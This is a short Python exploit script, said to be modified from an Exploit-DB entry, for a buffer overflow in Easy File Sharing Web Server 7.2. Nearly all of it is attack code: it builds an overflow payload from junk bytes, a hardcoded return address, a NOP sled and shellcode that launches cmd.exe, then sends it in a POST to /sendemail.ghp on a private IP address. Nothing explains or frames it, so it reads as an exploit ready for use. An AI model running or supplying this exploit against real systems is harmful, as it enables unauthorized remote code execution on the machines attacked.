Easy File Sharing Web Server 7.2 Bof – ESP

Original code: https://www.exploit-db.com/exploits/42165/

Modified.

#!/usr/bin/env python

import httplib

##################################

shellcode = ("\x8b\xec\x55\x8b\xec\x68\x65\x78\x65"
             "\x2F\x68\x63\x6d\x64\x2e\x8d\x45\xf8"
             "\x50\xb8\xc7\x93\xc2\x77\xff\xd0")

junk = "A" * 4072
esp = "\xD4\x71\xAE\x01"
nop = "\x90" * 12
bof = junk + esp + nop + shellcode;

httpServ = httplib.HTTPConnection("192.168.136.129", 80)
httpServ.connect()

httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % bof)
 
response = httpServ.getresponse()
 
 
httpServ.close()